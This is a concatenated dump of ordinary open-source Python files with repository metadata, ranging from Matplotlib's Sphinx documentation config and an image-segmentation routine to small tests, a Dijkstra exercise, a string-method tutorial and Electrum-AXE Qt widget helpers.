segments_x[..., np.newaxis],
segments_color],
axis=-1).reshape(-1, 3 + image.shape[3])
segments = np.ascontiguousarray(segments)
# we do the scaling of ratio in the same way as in the SLIC paper
# so the values have the same meaning
step = float(max((step_z, step_y, step_x)))
ratio = 1.0 / compactness
image = np.ascontiguousarray(image * ratio)
labels = _slic_cython(image, segments, step, max_iter, spacing, slic_zero)
if enforce_connectivity:
segment_size = depth * height * width / n_segments
min_size = int(min_size_factor * segment_size)
max_size = int(max_size_factor * segment_size)
labels = _enforce_label_connectivity_cython(labels,
min_size,
max_size)
if is_2d:
labels = labels[0]
return labels
| [
"[email protected]"
] | |
24b01653afda42c4f298c4de77f67fe16d74d598 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/matplotlib/2017/12/conf.py | c89c9d2c773a8efd08213dff9656b75f7cfde32b | [] | no_license | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 18,382 | py | # -*- coding: utf-8 -*-
#
# Matplotlib documentation build configuration file, created by
# sphinx-quickstart on Fri May 2 12:33:25 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import matplotlib
import os
import sys
import sphinx
import six
from glob import glob
from sphinx_gallery.sorting import ExplicitOrder
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
sys.path.append(os.path.abspath('.'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['matplotlib.sphinxext.mathmpl', 'sphinxext.math_symbol_table',
'sphinx.ext.autodoc', 'matplotlib.sphinxext.only_directives',
'sphinx.ext.doctest', 'sphinx.ext.autosummary',
'sphinx.ext.inheritance_diagram', 'sphinx.ext.intersphinx',
'sphinx_gallery.gen_gallery',
'matplotlib.sphinxext.plot_directive',
'sphinxext.github',
'numpydoc']
exclude_patterns = ['api/api_changes/*', 'users/whats_new/*']
def _check_deps():
names = {"colorspacious": 'colorspacious',
"IPython.sphinxext.ipython_console_highlighting": 'ipython',
"matplotlib": 'matplotlib',
"numpydoc": 'numpydoc',
"PIL.Image": 'pillow',
"sphinx_gallery": 'sphinx_gallery'}
if sys.version_info < (3, 3):
names["mock"] = 'mock'
missing = []
for name in names:
try:
__import__(name)
except ImportError:
missing.append(names[name])
if missing:
raise ImportError(
"The following dependencies are missing to build the "
"documentation: {}".format(", ".join(missing)))
_check_deps()
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
# Use IPython's console highlighting by default
extensions.extend(['IPython.sphinxext.ipython_console_highlighting',
'IPython.sphinxext.ipython_directive'])
if six.PY2:
from distutils.spawn import find_executable
has_dot = find_executable('dot') is not None
else:
from shutil import which # Python >= 3.3
has_dot = which('dot') is not None
if not has_dot:
raise OSError(
"No binary named dot - you need to install the Graph Visualization "
"software (usually packaged as 'graphviz') to build the documentation")
autosummary_generate = True
autodoc_docstring_signature = True
autodoc_default_flags = ['members', 'undoc-members']
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable', None)
}
explicit_order_folders = [
'../examples/api',
'../examples/pyplots',
'../examples/subplots_axes_and_figures',
'../examples/color',
'../examples/statistics',
'../examples/lines_bars_and_markers',
'../examples/images_contours_and_fields',
'../examples/shapes_and_collections',
'../examples/text_labels_and_annotations',
'../examples/pie_and_polar_charts',
'../examples/style_sheets',
'../examples/axes_grid',
'../examples/showcase',
'../tutorials/introductory',
'../tutorials/intermediate',
'../tutorials/advanced']
for folder in sorted(glob('../examples/*') + glob('../tutorials/*')):
if not os.path.isdir(folder) or folder in explicit_order_folders:
continue
explicit_order_folders.append(folder)
# Sphinx gallery configuration
sphinx_gallery_conf = {
'examples_dirs': ['../examples', '../tutorials'],
'filename_pattern': '^((?!sgskip).)*$',
'gallery_dirs': ['gallery', 'tutorials'],
'doc_module': ('matplotlib', 'mpl_toolkits'),
'reference_url': {
'matplotlib': None,
'numpy': 'https://docs.scipy.org/doc/numpy',
'scipy': 'https://docs.scipy.org/doc/scipy/reference',
},
'backreferences_dir': 'api/_as_gen',
'subsection_order': ExplicitOrder(explicit_order_folders),
'min_reported_time': 1,
}
plot_gallery = 'True'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# This is the default encoding, but it doesn't hurt to be explicit
source_encoding = "utf-8"
# The master toctree document.
master_doc = 'contents'
# General substitutions.
project = 'Matplotlib'
copyright = ('2002 - 2012 John Hunter, Darren Dale, Eric Firing, '
'Michael Droettboom and the Matplotlib development '
'team; 2012 - 2017 The Matplotlib development team')
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = matplotlib.__version__
# The full version, including alpha/beta/rc tags.
release = version
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
unused_docs = []
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
default_role = 'obj'
# Plot directive configuration
# ----------------------------
plot_formats = [('png', 100), ('pdf', 100)]
# Github extension
github_project_url = "https://github.com/matplotlib/matplotlib/"
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'matplotlib.css'
html_style = 'mpl.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = 'logo.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If nonempty, this is the file name suffix for generated HTML files. The
# default is ``".html"``.
html_file_suffix = '.html'
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Content template for the index page.
html_index = 'index.html'
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Custom sidebar templates, maps page names to templates.
html_sidebars = {
'index': ['donate_sidebar.html', 'searchbox.html'],
'**': ['localtoc.html', 'relations.html',
'sourcelink.html', 'searchbox.html']
}
# If false, no module index is generated.
#html_use_modindex = True
html_domain_indices = ["py-modindex"]
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.
html_use_opensearch = 'False'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Matplotlibdoc'
# Path to favicon
html_favicon = '_static/favicon.ico'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
latex_paper_size = 'letter'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('contents', 'Matplotlib.tex', 'Matplotlib',
'John Hunter, Darren Dale, Eric Firing, Michael Droettboom and the '
'matplotlib development team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = None
latex_elements = {}
# Additional stuff for the LaTeX preamble.
latex_elements['preamble'] = r"""
% In the parameters section, place a newline after the Parameters
% header. (This is stolen directly from Numpy's conf.py, since it
% affects Numpy-style docstrings).
\usepackage{expdlist}
\let\latexdescription=\description
\def\description{\latexdescription{}{} \breaklabel}
\usepackage{amsmath}
\usepackage{amsfonts}
\usepackage{amssymb}
\usepackage{txfonts}
% The enumitem package provides unlimited nesting of lists and
% enums. Sphinx may use this in the future, in which case this can
% be removed. See
% https://bitbucket.org/birkenfeld/sphinx/issue/777/latex-output-too-deeply-nested
\usepackage{enumitem}
\setlistdepth{2048}
"""
latex_elements['pointsize'] = '11pt'
# Documents to append as an appendix to all manuals.
latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = True
if hasattr(sphinx, 'version_info') and sphinx.version_info[:2] >= (1, 4):
latex_toplevel_sectioning = 'part'
else:
latex_use_parts = True
# Show both class-level docstring and __init__ docstring in class
# documentation
autoclass_content = 'both'
rst_epilog = """
.. |minimum_numpy_version| replace:: %s
""" % matplotlib.__version__numpy__
texinfo_documents = [
("contents", 'matplotlib', 'Matplotlib Documentation',
'John Hunter@*Darren Dale@*Eric Firing@*Michael Droettboom@*'
'The matplotlib development team',
'Matplotlib', "Python plotting package", 'Programming',
1),
]
class MyWX(MagicMock):
class Panel(object):
pass
class ToolBar(object):
pass
class Frame(object):
pass
VERSION_STRING = '2.9'
class MyPyQt4(MagicMock):
class QtGui(object):
# PyQt4.QtGui public classes.
# Generated with
# textwrap.fill([name for name in dir(PyQt4.QtGui)
# if isinstance(getattr(PyQt4.QtGui, name), type)])
_QtGui_public_classes = """\
Display QAbstractButton QAbstractGraphicsShapeItem
QAbstractItemDelegate QAbstractItemView QAbstractPrintDialog
QAbstractProxyModel QAbstractScrollArea QAbstractSlider
QAbstractSpinBox QAbstractTextDocumentLayout QAction QActionEvent
QActionGroup QApplication QBitmap QBoxLayout QBrush QButtonGroup
QCalendarWidget QCheckBox QClipboard QCloseEvent QColor QColorDialog
QColumnView QComboBox QCommandLinkButton QCommonStyle QCompleter
QConicalGradient QContextMenuEvent QCursor QDataWidgetMapper QDateEdit
QDateTimeEdit QDesktopServices QDesktopWidget QDial QDialog
QDialogButtonBox QDirModel QDockWidget QDoubleSpinBox QDoubleValidator
QDrag QDragEnterEvent QDragLeaveEvent QDragMoveEvent QDropEvent
QErrorMessage QFileDialog QFileIconProvider QFileOpenEvent
QFileSystemModel QFocusEvent QFocusFrame QFont QFontComboBox
QFontDatabase QFontDialog QFontInfo QFontMetrics QFontMetricsF
QFormLayout QFrame QGesture QGestureEvent QGestureRecognizer QGlyphRun
QGradient QGraphicsAnchor QGraphicsAnchorLayout QGraphicsBlurEffect
QGraphicsColorizeEffect QGraphicsDropShadowEffect QGraphicsEffect
QGraphicsEllipseItem QGraphicsGridLayout QGraphicsItem
QGraphicsItemAnimation QGraphicsItemGroup QGraphicsLayout
QGraphicsLayoutItem QGraphicsLineItem QGraphicsLinearLayout
QGraphicsObject QGraphicsOpacityEffect QGraphicsPathItem
QGraphicsPixmapItem QGraphicsPolygonItem QGraphicsProxyWidget
QGraphicsRectItem QGraphicsRotation QGraphicsScale QGraphicsScene
QGraphicsSceneContextMenuEvent QGraphicsSceneDragDropEvent
QGraphicsSceneEvent QGraphicsSceneHelpEvent QGraphicsSceneHoverEvent
QGraphicsSceneMouseEvent QGraphicsSceneMoveEvent
QGraphicsSceneResizeEvent QGraphicsSceneWheelEvent
QGraphicsSimpleTextItem QGraphicsTextItem QGraphicsTransform
QGraphicsView QGraphicsWidget QGridLayout QGroupBox QHBoxLayout
QHeaderView QHelpEvent QHideEvent QHoverEvent QIcon QIconDragEvent
QIconEngine QIconEngineV2 QIdentityProxyModel QImage QImageIOHandler
QImageReader QImageWriter QInputContext QInputContextFactory
QInputDialog QInputEvent QInputMethodEvent QIntValidator QItemDelegate
QItemEditorCreatorBase QItemEditorFactory QItemSelection
QItemSelectionModel QItemSelectionRange QKeyEvent QKeyEventTransition
QKeySequence QLCDNumber QLabel QLayout QLayoutItem QLineEdit
QLinearGradient QListView QListWidget QListWidgetItem QMainWindow
QMatrix QMatrix2x2 QMatrix2x3 QMatrix2x4 QMatrix3x2 QMatrix3x3
QMatrix3x4 QMatrix4x2 QMatrix4x3 QMatrix4x4 QMdiArea QMdiSubWindow
QMenu QMenuBar QMessageBox QMimeSource QMouseEvent
QMouseEventTransition QMoveEvent QMovie QPageSetupDialog QPaintDevice
QPaintEngine QPaintEngineState QPaintEvent QPainter QPainterPath
QPainterPathStroker QPalette QPanGesture QPen QPicture QPictureIO
QPinchGesture QPixmap QPixmapCache QPlainTextDocumentLayout
QPlainTextEdit QPolygon QPolygonF QPrintDialog QPrintEngine
QPrintPreviewDialog QPrintPreviewWidget QPrinter QPrinterInfo
QProgressBar QProgressDialog QProxyModel QPushButton QPyTextObject
QQuaternion QRadialGradient QRadioButton QRawFont QRegExpValidator
QRegion QResizeEvent QRubberBand QScrollArea QScrollBar
QSessionManager QShortcut QShortcutEvent QShowEvent QSizeGrip
QSizePolicy QSlider QSortFilterProxyModel QSound QSpacerItem QSpinBox
QSplashScreen QSplitter QSplitterHandle QStackedLayout QStackedWidget
QStandardItem QStandardItemModel QStaticText QStatusBar
QStatusTipEvent QStringListModel QStyle QStyleFactory QStyleHintReturn
QStyleHintReturnMask QStyleHintReturnVariant QStyleOption
QStyleOptionButton QStyleOptionComboBox QStyleOptionComplex
QStyleOptionDockWidget QStyleOptionDockWidgetV2 QStyleOptionFocusRect
QStyleOptionFrame QStyleOptionFrameV2 QStyleOptionFrameV3
QStyleOptionGraphicsItem QStyleOptionGroupBox QStyleOptionHeader
QStyleOptionMenuItem QStyleOptionProgressBar QStyleOptionProgressBarV2
QStyleOptionRubberBand QStyleOptionSizeGrip QStyleOptionSlider
QStyleOptionSpinBox QStyleOptionTab QStyleOptionTabBarBase
QStyleOptionTabBarBaseV2 QStyleOptionTabV2 QStyleOptionTabV3
QStyleOptionTabWidgetFrame QStyleOptionTabWidgetFrameV2
QStyleOptionTitleBar QStyleOptionToolBar QStyleOptionToolBox
QStyleOptionToolBoxV2 QStyleOptionToolButton QStyleOptionViewItem
QStyleOptionViewItemV2 QStyleOptionViewItemV3 QStyleOptionViewItemV4
QStylePainter QStyledItemDelegate QSwipeGesture QSyntaxHighlighter
QSystemTrayIcon QTabBar QTabWidget QTableView QTableWidget
QTableWidgetItem QTableWidgetSelectionRange QTabletEvent
QTapAndHoldGesture QTapGesture QTextBlock QTextBlockFormat
QTextBlockGroup QTextBlockUserData QTextBrowser QTextCharFormat
QTextCursor QTextDocument QTextDocumentFragment QTextDocumentWriter
QTextEdit QTextFormat QTextFragment QTextFrame QTextFrameFormat
QTextImageFormat QTextInlineObject QTextItem QTextLayout QTextLength
QTextLine QTextList QTextListFormat QTextObject QTextObjectInterface
QTextOption QTextTable QTextTableCell QTextTableCellFormat
QTextTableFormat QTimeEdit QToolBar QToolBox QToolButton QToolTip
QTouchEvent QTransform QTreeView QTreeWidget QTreeWidgetItem
QTreeWidgetItemIterator QUndoCommand QUndoGroup QUndoStack QUndoView
QVBoxLayout QValidator QVector2D QVector3D QVector4D QWhatsThis
QWhatsThisClickedEvent QWheelEvent QWidget QWidgetAction QWidgetItem
QWindowStateChangeEvent QWizard QWizardPage QWorkspace
QX11EmbedContainer QX11EmbedWidget QX11Info
"""
for _name in _QtGui_public_classes.split():
locals()[_name] = type(_name, (), {})
del _name
class MySip(MagicMock):
def getapi(*args):
return 1
mockwxversion = MagicMock()
mockwx = MyWX()
mocksip = MySip()
mockpyqt4 = MyPyQt4()
sys.modules['wxversion'] = mockwxversion
sys.modules['wx'] = mockwx
sys.modules['sip'] = mocksip
sys.modules['PyQt4'] = mockpyqt4
# numpydoc config
numpydoc_show_class_members = False
# Skip deprecated members
def skip_deprecated(app, what, name, obj, skip, options):
if skip:
return skip
skipped = {"matplotlib.colors": ["ColorConverter", "hex2color", "rgb2hex"]}
skip_list = skipped.get(getattr(obj, "__module__", None))
if skip_list is not None:
return getattr(obj, "__name__", None) in skip_list
def setup(app):
app.connect('autodoc-skip-member', skip_deprecated)
| [
"[email protected]"
] | |
0a20a0a7c7b6b3c688405d2ef7bcee0b30ed230f | ee3e0a69093e82deff1bddf607f6ce0dde372c48 | /coding_test/카카오 인턴/num_4.py | 226a287c788a6bf68f50fcecbe70e1a4d17bfa7e | [] | no_license | cndqjacndqja/algorithm_python | 202f9990ea367629aecdd14304201eb6fa2aa37e | 843269cdf8fb9d4c215c92a97fc2d007a8f96699 | refs/heads/master | 2023-06-24T08:12:29.639424 | 2021-07-24T05:08:46 | 2021-07-24T05:08:46 | 255,552,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | from heapq import heappush, heappop
INF = int(1e9)
def solution(n, start, end, roads, traps):
data = [[] for _ in range(n+1)]
for i in roads:
a, b, c = i
data[a].append((b, c))
def dijkstra(start, end, n, data):
distance = [INF for _ in range(n+1)]
distance[start] = 0
q = []
heappush(q, (0, start))
while q:
dis, node = heappop(q)
if distance[node] < dis:
continue
for i in data[node]:
cost = dis + i[1]
if distance[i[0]] > cost:
heappush(q, (cost, i[0]))
distance[i[0]] = cost
return distance[end]
| [
"[email protected]"
] | |
4489ddbba60f18b2f96f68362668c0918617c6d0 | e96cc817c768915eeff46027ded14e759e8042ff | /Python基础/字符串/判断.py | a08d4cb40f7a539f93ede6b04ae4724cf9c0e573 | [] | no_license | fovegage/learn-python | e22a32207cf513ba0f8c3428e9c00138987c2359 | 93b8d3513769a0b7d492a7b515f289fe3f1efc4a | refs/heads/master | 2023-06-08T13:44:57.274677 | 2023-05-29T05:52:35 | 2023-05-29T05:52:35 | 148,493,932 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,187 | py | # -*- coding: utf-8 -*-
# @Time : 2018/12/27 14:45
# @Author : fovegage
# @Email : [email protected]
# @File : 判断.py
# @Software: PyCharm
# islower 仅对字母判断
str = 'hello'
print(str.islower())
# isalnum() 判断是否由数字和字母组成
str = 'jjjssss22'
print(str.isalnum())
# isalpha() 判断只有字母 26个字母以外均报错
str = 'sjsksk'
print(str.isalpha())
# isdecimal() 若全部是十进制数返回true 否则false
demo = '1234'
print(demo.isdecimal())
# isidentifier() 是否是python标识符 由字母、数字、下划线组成 且不能以数字开头
str = '90'
print(str.isidentifier()) # False
# islower() 是否全部是小写
str = 'Tskksks'
print(str.islower()) # False
# isdigit() 是否全部是数字
num = '999'
print(num.isdigit())
# isspace() 若是空格或制表符返回True 其他均false 注意 '' 和 ' '是不一样的
str = '\t'
print(str.isspace())
# istitle() 判断是否是大写开头
str = 'dTg'
print(str.istitle())
# 若全部是数字返回true isdigit()的加强版 支持'²3455'
s = '\u00B23455'
print(repr(s))
print(s.isnumeric()) | [
"[email protected]"
] | |
de75179eb73337e3b223f1e9b50d70bc2438f591 | b2d2ce1752ec5ea39b70ae37551bc162a748b469 | /tests/unit/pypyraws/version_test.py | 4ec7ddabcd59da582daa199da4ef6a25a4c6a7b9 | [
"Apache-2.0"
] | permissive | AvdN/pypyr-aws | 05c28abb904e2f71a0fbdaacaeaf20b458f97c52 | 96477b2deb46b6db73fa6d64f1350991dd378c31 | refs/heads/master | 2021-01-24T06:46:41.130069 | 2017-06-02T15:03:15 | 2017-06-02T15:03:15 | 93,318,585 | 0 | 0 | null | 2017-06-04T14:23:52 | 2017-06-04T14:23:52 | null | UTF-8 | Python | false | false | 319 | py | """version.py unit tests."""
import pypyraws.version
import platform
def test_get_version():
actual = pypyraws.version.get_version()
expected = (f'pypyraws {pypyraws.version.__version__} '
f'python {platform.python_version()}')
assert actual == expected, "version not returning correctly"
| [
"[email protected]"
] | |
da5e68cfc1a7005a1e829bc6a913fac6fd2f1f7d | 1e263d605d4eaf0fd20f90dd2aa4174574e3ebce | /components/ally-http/ally/http/spec/server.py | 6712ab685dee0fe68395d0005537a4483bf101b2 | [] | no_license | galiminus/my_liveblog | 698f67174753ff30f8c9590935d6562a79ad2cbf | 550aa1d0a58fc30aa9faccbfd24c79a0ceb83352 | refs/heads/master | 2021-05-26T20:03:13.506295 | 2013-04-23T09:57:53 | 2013-04-23T09:57:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,564 | py | '''
Created on Jun 1, 2012
@package: ally http
@copyright: 2012 Sourcefabric o.p.s.
@license: http://www.gnu.org/licenses/gpl-3.0.txt
@author: Gabriel Nistor
Provides HTTP server specification.
'''
from ally.design.context import Context, defines, requires, optional
from ally.support.util_io import IInputStream
from collections import Iterable
import abc
# --------------------------------------------------------------------
# HTTP methods.
METHOD_GET = 'GET'
METHOD_DELETE = 'DELETE'
METHOD_POST = 'POST'
METHOD_PUT = 'PUT'
METHOD_OPTIONS = 'OPTIONS'
METHOD_UNKNOWN = 'UNKNOWN'
METHODS = frozenset((METHOD_GET, METHOD_DELETE, METHOD_POST, METHOD_PUT, METHOD_OPTIONS))
# --------------------------------------------------------------------
class RequestHTTP(Context):
'''
Context for HTTP request data.
'''
# ---------------------------------------------------------------- Defined
scheme = defines(str, doc='''
@rtype: string
The scheme URI protocol name to be used for the response.
''')
methodName = defines(str, doc='''
@rtype: string
The HTTP method name of the request.
''')
uriRoot = defines(str, doc='''
@rtype: string
The root URI to be considered for constructing a request path, basically the relative path root.
''')
uri = defines(str, doc='''
@rtype: string
The relative request URI.
''')
parameters = defines(list, doc='''
@rtype: list[tuple(string, string)]
The parameters of the request.
''')
headers = defines(dict, doc='''
@rtype: dictionary{string, string}
The raw headers.
''')
class RequestContentHTTP(Context):
'''
Context for HTTP request content data.
'''
# ---------------------------------------------------------------- Defined
source = defines(IInputStream, doc='''
@rtype: IInputStream
The source for the request content.
''')
class ResponseHTTP(Context):
'''
Context for HTTP response data.
'''
# ---------------------------------------------------------------- Required
code = requires(int, doc='''
@rtype: integer
The HTTP response code.
''')
isSuccess = requires(bool, doc='''
@rtype: boolean
True if the response is a success, False otherwise.
''')
# ---------------------------------------------------------------- Optional
text = optional(str, doc='''
@rtype: str
The response text message (a short message).
''')
headers = optional(dict, doc='''
@rtype: dictionary{String, string}
The response headers.
''')
class ResponseContentHTTP(Context):
'''
Context for HTTP response content data.
'''
# ---------------------------------------------------------------- Required
source = requires(IInputStream, Iterable, doc='''
@rtype: IInputStream|Iterable
The source for the response content.
''')
# --------------------------------------------------------------------
class IDecoderHeader(metaclass=abc.ABCMeta):
'''
Provides the header retrieve, parsing and decoding.
'''
@abc.abstractmethod
def retrieve(self, name):
'''
Get the raw header value.
@param name: string
The name of the header to retrieve.
@return: string|None
The raw header value or None if there is no such header.
'''
@abc.abstractmethod
def decode(self, name):
'''
Get the decoded the header value.
@param name: string
The name of the header to decode.
@return: list[tuple(string, dictionary{string:string})]
A list of tuples having as the first entry the header value and the second entry a dictionary
with the value attribute.
'''
class IEncoderHeader(metaclass=abc.ABCMeta):
'''
Provides the header encoding.
'''
@abc.abstractmethod
def encode(self, name, *value):
'''
Encodes the header values.
ex:
convert('multipart/formdata', 'mixed') == 'multipart/formdata, mixed'
convert(('multipart/formdata', ('charset', 'utf-8'), ('boundry', '12))) ==
'multipart/formdata; charset=utf-8; boundry=12'
@param name: string
The name of the header to set.
@param value: arguments[tuple(string, tuple(string, string))|string]
Tuples containing as first value found in the header and as the second value a tuple with the
values attribute.
''' | [
"[email protected]"
] | |
db7daaad0a903a177dcefeb07c6912390cdeb411 | b5fa959a5a1a6cd1e5027e41ed45b6dfb1c19151 | /testapp/tests/test_models.py | 63eb981a166d436d958ec9b87a1b3dde0dbd614a | [
"MIT"
] | permissive | Mikekh84/learning-journal | 13c8e036620d4286f7e6bf3c1d9df0c5e0d368d8 | d0d5af7913790ab895a2fa530aa259cf2934f49b | refs/heads/master | 2021-01-17T17:12:15.009156 | 2016-03-28T02:50:48 | 2016-03-28T02:50:48 | 54,362,834 | 0 | 1 | null | 2016-03-28T02:50:48 | 2016-03-21T05:43:15 | Python | UTF-8 | Python | false | false | 511 | py | # -*- coding: utf-8 -*-
from testapp.models import Entry, DBSession, render_markdown
def test_create_entry(dbtransaction):
"""Test for a change of state of the model."""
new_model = Entry(title="jill", text='jello')
assert new_model.id is None
DBSession.add(new_model)
DBSession.flush()
assert new_model.id is not None
def test_render_markdown():
"""Assert render markdown works."""
content = 'Hello'
output = render_markdown(content)
assert output == '<p>Hello</p>'
| [
"[email protected]"
] | |
01fcb935acc0135bfe239ab840b1a23d21b0ad2f | cb79e16729aba7d2ce04a2501cf51bcb4655bc34 | /electrum_axe/gui/qt/util.py | f27835254f268f16de26faf1512143716c5095f9 | [
"MIT"
] | permissive | ddude1/electrum-axe | ecdf69fe1ea4dd28da4817587049920a253974db | b2d030dfc2afb2ca27739b9169ac610c68421dbb | refs/heads/master | 2020-12-14T16:31:00.997749 | 2019-12-16T05:14:40 | 2019-12-16T05:14:40 | 127,673,858 | 0 | 0 | MIT | 2020-01-18T22:36:07 | 2018-04-01T21:45:54 | Python | UTF-8 | Python | false | false | 31,415 | py | import asyncio
import os.path
import time
import sys
import platform
import queue
import traceback
import os
import webbrowser
from functools import partial, lru_cache
from typing import NamedTuple, Callable, Optional, TYPE_CHECKING, Union, List, Dict
from PyQt5.QtGui import (QFont, QColor, QCursor, QPixmap, QStandardItem,
QPalette, QIcon, QFontMetrics)
from PyQt5.QtCore import (Qt, QPersistentModelIndex, QModelIndex, pyqtSignal,
QCoreApplication, QItemSelectionModel, QThread,
QSortFilterProxyModel, QSize, QLocale)
from PyQt5.QtWidgets import (QPushButton, QLabel, QMessageBox, QHBoxLayout,
QAbstractItemView, QVBoxLayout, QLineEdit,
QStyle, QDialog, QGroupBox, QButtonGroup, QRadioButton,
QFileDialog, QWidget, QToolButton, QTreeView, QPlainTextEdit,
QHeaderView, QApplication, QToolTip, QTreeWidget, QStyledItemDelegate)
from electrum_axe.i18n import _, languages
from electrum_axe.util import (FileImportFailed, FileExportFailed,
resource_path)
from electrum_axe.paymentrequest import PR_UNPAID, PR_PAID, PR_EXPIRED
if TYPE_CHECKING:
from .main_window import ElectrumWindow
if platform.system() == 'Windows':
if platform.release() in ['7', '8', '10']:
MONOSPACE_FONT = 'Consolas'
else:
MONOSPACE_FONT = 'Lucida Console'
elif platform.system() == 'Darwin':
MONOSPACE_FONT = 'Menlo'
else:
MONOSPACE_FONT = 'monospace'
dialogs = []
pr_icons = {
PR_UNPAID:"unpaid.png",
PR_PAID:"confirmed.png",
PR_EXPIRED:"expired.png"
}
pr_tooltips = {
PR_UNPAID:_('Pending'),
PR_PAID:_('Paid'),
PR_EXPIRED:_('Expired')
}
expiration_values = [
(_('1 hour'), 60*60),
(_('1 day'), 24*60*60),
(_('1 week'), 7*24*60*60),
(_('Never'), None)
]
class EnterButton(QPushButton):
def __init__(self, text, func):
QPushButton.__init__(self, text)
self.func = func
self.clicked.connect(func)
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ThreadedButton(QPushButton):
def __init__(self, text, task, on_success=None, on_error=None):
QPushButton.__init__(self, text)
self.task = task
self.on_success = on_success
self.on_error = on_error
self.clicked.connect(self.run_task)
def run_task(self):
self.setEnabled(False)
self.thread = TaskThread(self)
self.thread.add(self.task, self.on_success, self.done, self.on_error)
def done(self):
self.setEnabled(True)
self.thread.stop()
class WWLabel(QLabel):
def __init__ (self, text="", parent=None):
QLabel.__init__(self, text, parent)
self.setWordWrap(True)
self.setTextInteractionFlags(Qt.TextSelectableByMouse)
class HelpLabel(QLabel):
def __init__(self, text, help_text):
QLabel.__init__(self, text)
self.help_text = help_text
self.app = QCoreApplication.instance()
self.font = QFont()
def mouseReleaseEvent(self, x):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Help'),
text=self.help_text)
def enterEvent(self, event):
self.font.setUnderline(True)
self.setFont(self.font)
self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
return QLabel.enterEvent(self, event)
def leaveEvent(self, event):
self.font.setUnderline(False)
self.setFont(self.font)
self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
return QLabel.leaveEvent(self, event)
class HelpButton(QPushButton):
def __init__(self, text):
QPushButton.__init__(self, '?')
self.help_text = text
self.setFocusPolicy(Qt.NoFocus)
self.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.clicked.connect(self.onclick)
def onclick(self):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Help'),
text=self.help_text,
rich_text=True)
class InfoButton(QPushButton):
def __init__(self, text):
QPushButton.__init__(self, 'Info')
self.help_text = text
self.setFocusPolicy(Qt.NoFocus)
self.setFixedWidth(6 * char_width_in_lineedit())
self.clicked.connect(self.onclick)
def onclick(self):
custom_message_box(icon=QMessageBox.Information,
parent=self,
title=_('Info'),
text=self.help_text,
rich_text=True)
class Buttons(QHBoxLayout):
def __init__(self, *buttons):
QHBoxLayout.__init__(self)
self.addStretch(1)
for b in buttons:
self.addWidget(b)
class CloseButton(QPushButton):
def __init__(self, dialog):
QPushButton.__init__(self, _("Close"))
self.clicked.connect(dialog.close)
self.setDefault(True)
class CopyButton(QPushButton):
def __init__(self, text_getter, app):
QPushButton.__init__(self, _("Copy"))
self.clicked.connect(lambda: app.clipboard().setText(text_getter()))
class CopyCloseButton(QPushButton):
def __init__(self, text_getter, app, dialog):
QPushButton.__init__(self, _("Copy and Close"))
self.clicked.connect(lambda: app.clipboard().setText(text_getter()))
self.clicked.connect(dialog.close)
self.setDefault(True)
class OkButton(QPushButton):
def __init__(self, dialog, label=None):
QPushButton.__init__(self, label or _("OK"))
self.clicked.connect(dialog.accept)
self.setDefault(True)
